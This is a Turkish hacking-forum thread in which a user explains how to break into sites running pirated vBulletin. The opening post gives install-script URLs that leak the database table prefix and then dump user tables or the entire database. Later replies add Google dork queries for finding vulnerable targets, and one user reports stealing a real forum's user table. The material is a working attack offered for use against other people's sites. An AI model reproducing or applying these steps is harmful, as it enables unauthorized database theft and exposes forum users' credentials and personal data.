folder Tahribat.com Forumları
linefolder Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
linefolder Nulled Tabanlı Vbulletin Paketlerini Kolay Yoldan Hack.

Nulled Tabanlı Vbulletin Paketlerini Kolay Yoldan Hack.

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Sharkmisdeed
    Sharkmisdeed's avatar
    Erkek

Selamlar Tahribat ailesi. Ben bu ilk dökümanımı sizlerle paylaşmak istiyorum.

Tamamiyle kendim bulduğum ve Yeni açılmış siteler hacklenir bununla. Gibi saçma sapan yorumlarada cevap bile vermeyeceğim bir konudur. Çünkü alakası yoktur. Nulled Paketler bilgilerini install dizininden alır ! ve Bu nedenle o dizin kaldırılamaz !! Peki Nulled version nedir ? vBulletin Lisans isteyen bir yazılımdır. Nulled korsan versionudur. Ve Korsanlar anca denizde iş yapar.Karada onları Yeriz :D

Başlayalım.

Nulled Paketli sitemizi bulduk. Hemen en basit yöntemi deneyelim.

http://hedef.com/install/upgrade_300.php

Oldu yada olmadı ? :D Please enter customer number :D ah yakalandık güvenlik paneli ..

Evet kolay yol olmadı varsayıyorum.

Eveet gelelim fasulyenin hackerlığına.. Denemek için birde buna bakalım

http://hedef.com/install/upgrade_300.php?step=1 

Ah güzel .. çünkü bu olmak zorunda :D

Step 1) Fix Some Table Errors (Step 1 of 2)
    Database error in vBulletin 3.x.x:
    Invalid SQL:
    ALTER TABLE vb_forum ADD birthday_search DATE NOT NULL DEFAULT '0000-00-00';
    MySQL Error : Duplicate column name 'birthday_search'

Evet !! artık table_prefix'i biliyoruz Değilmi ? Bununla ne mi yapabiliriz.Bütün Kullanıcı listesini görebiliriz.Yada tüm database'i çalabiliriz !!

Nasıl olacak. Örnek veriyorum

http://hedef.com/install/upgrade_301.php?step=backup&do=sqltable&table=vb_forum  User Table'larını çalarız :D

http://hedef.com/install/upgrade_301.php?step=backup&do=sqltable Tüm database'i çalarız !!

NOT : Bazı NULLED Versionlar'da Install klasörü yine kaldırılamıyor fakat ismi değiştirilebiliyor. Bunuda Apache hack yöntemiyle bir dahaki konumda anlatıcam.

ALINTI DEĞİLDİR!! TAMAMEN SHARKMISDEED TARAFINDAN HAZIRLANMIŞTIR.

2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    rapidhacker550
    rapidhacker550's avatar
    Erkek
    destek@tahribat.com a atsaydın ya

T.C Anayasası Madde 26 : Herkes, düşünce ve kanaatlerini söz, yazı, resim veya başka yollarla tek başına veya toplu olarak açıklama ve yayma hakkına sahiptir. Bu hürriyet resmi makamların müdahalesi olmaksızın haber veya fikir almak ya da vermek serbestliğini de kapsar. Bu fıkra hükmü, radyo, televizyon, sinema veya benzeri yollarla yapılan yayımların izin sistemine bağlanmasına engel değildir.
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Sharkmisdeed
    Sharkmisdeed's avatar
    Erkek
    Hmm o konuda bir bilgim yoktu. O Yüzden burada açtım
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    rapidhacker550
    rapidhacker550's avatar
    Erkek
    istersen bi gönder sende koyarlarmı bilmem

T.C Anayasası Madde 26 : Herkes, düşünce ve kanaatlerini söz, yazı, resim veya başka yollarla tek başına veya toplu olarak açıklama ve yayma hakkına sahiptir. Bu hürriyet resmi makamların müdahalesi olmaksızın haber veya fikir almak ya da vermek serbestliğini de kapsar. Bu fıkra hükmü, radyo, televizyon, sinema veya benzeri yollarla yapılan yayımların izin sistemine bağlanmasına engel değildir.
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ★★★★
    Genki
    Genki's avatar
    Erkek
    güzelmiş. Denedim yedi valla :) Ancak bunu hack için değilde pr kasmak için kullanmak lazım :p pr 4 forumun user tablosunu indirdim ancak hashı kırmak kolay olmicak gibi
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Yeah
    Yeah's avatar
    Erkek

bende deneyeyim dedim ama google da nasıl arama yapıpta nulled vb bulcam bilemedim :P =))

bende hek yapmak istiyorum bende isko olmak istiyorum :|

herşeyin kısası makbuldur; ulaşmak isteyen yesterfox_55@hotmail.com a mail atabilir...
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    rapidhacker550
    rapidhacker550's avatar
    Erkek
    evet yiyior

8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ★★★★
    Genki
    Genki's avatar
    Erkek
    inurl:upgrade_301.php veya scriptmafia inurl:upgrade_301.php yapıncada zaten benim bulduğumun teki cikio
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    rapidhacker550
    rapidhacker550's avatar
    Erkek

nulled tabanlı oldugunu nasıl anlıcaz ki?

10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ★★★★
    Genki
    Genki's avatar
    Erkek
    deneyerek
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    rapidhacker550
    rapidhacker550's avatar
    Erkek
    uzun iş yani

Toplam Hit: 6096 Toplam Mesaj: 25